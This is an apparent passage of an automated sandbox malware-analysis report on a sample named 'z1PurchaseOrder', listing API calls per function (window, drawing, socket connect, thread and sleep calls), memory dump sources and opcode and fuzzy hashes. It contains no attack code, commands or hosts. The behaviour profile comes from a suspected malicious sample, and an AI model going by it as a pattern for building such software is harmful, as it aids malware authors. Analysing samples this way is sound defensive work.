                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CursorMenuPopupTrack$Proc
                                        • String ID:
                                        • API String ID: 1300944170-0
                                        • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                        • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                        • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                        • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                        APIs
                                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                        • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                        • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                          • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                          • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                          • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                          • Part of subcall function 004413F0: SendMessageW.USER32(00981BB0,000000F1,00000000,00000000), ref: 004414C6
                                          • Part of subcall function 004413F0: SendMessageW.USER32(00981BB0,000000F1,00000001,00000000), ref: 004414F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$EnableMessageSend$LongShow
                                        • String ID:
                                        • API String ID: 142311417-0
                                        • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                        • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                        • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                        • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                        APIs
                                        • _memset.LIBCMT ref: 0044955A
                                          • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                        • _wcslen.LIBCMT ref: 004495C1
                                        • _wcslen.LIBCMT ref: 004495CE
                                        • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen$_memset_wcspbrk
                                        • String ID:
                                        • API String ID: 1843234404-0
                                        • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                        • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                        • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                        • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                        • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                        • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                        • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00445721
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                        • _wcslen.LIBCMT ref: 004457A3
                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                        • String ID:
                                        • API String ID: 3087257052-0
                                        • Opcode ID: 707967777abbcb615846d4014dd15678eb91240126a64b2d293a4799175c36b7
                                        • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                        • Opcode Fuzzy Hash: 707967777abbcb615846d4014dd15678eb91240126a64b2d293a4799175c36b7
                                        • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 00459DEF
                                        • GetForegroundWindow.USER32 ref: 00459E07
                                        • GetDC.USER32(00000000), ref: 00459E44
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                        • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                        • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                        • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                        APIs
                                          • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                        • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                        • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                        • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                        • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                        • String ID:
                                        • API String ID: 245547762-0
                                        • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                        • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                        • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                        • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00447151
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                        • SelectObject.GDI32(?,00000000), ref: 004471A2
                                        • BeginPath.GDI32(?), ref: 004471B7
                                        • SelectObject.GDI32(?,00000000), ref: 004471DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Object$Select$BeginCreateDeletePath
                                        • String ID:
                                        • API String ID: 2338827641-0
                                        • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                        • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                        • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                        • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                        APIs
                                        • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                        • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                        • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                        • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                        • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                        APIs
                                        • SendMessageW.USER32 ref: 0046FD00
                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                        • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                        • DestroyIcon.USER32(?), ref: 0046FD58
                                        • DestroyIcon.USER32(?), ref: 0046FD5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyIcon
                                        • String ID:
                                        • API String ID: 3419509030-0
                                        • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                        • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                        • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                        • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                        APIs
                                        • __getptd.LIBCMT ref: 004175AE
                                          • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                          • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                        • __amsg_exit.LIBCMT ref: 004175CE
                                        • __lock.LIBCMT ref: 004175DE
                                        • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                        • InterlockedIncrement.KERNEL32(00982CE0), ref: 00417626
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                        • String ID:
                                        • API String ID: 4271482742-0
                                        • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                        • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                        • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                        • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                        • String ID:
                                        • API String ID: 4023252218-0
                                        • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                        • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                        • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                        • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                        • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                        • MessageBeep.USER32(00000000), ref: 0046036D
                                        • KillTimer.USER32(?,0000040A), ref: 00460392
                                        • EndDialog.USER32(?,00000001), ref: 004603AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                        • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                        • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                        • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                        APIs
                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                        • String ID:
                                        • API String ID: 1489400265-0
                                        • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                        • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                        • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                        • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                        APIs
                                          • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                        • String ID:
                                        • API String ID: 1042038666-0
                                        • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                        • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                        • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                        • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                        • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                        • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                        • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                        APIs
                                          • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                        • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                        • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                        • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                        • ExitThread.KERNEL32 ref: 0041410F
                                        • GetCurrentThreadId.KERNEL32 ref: 00414115
                                        • __freefls@4.LIBCMT ref: 00414135
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
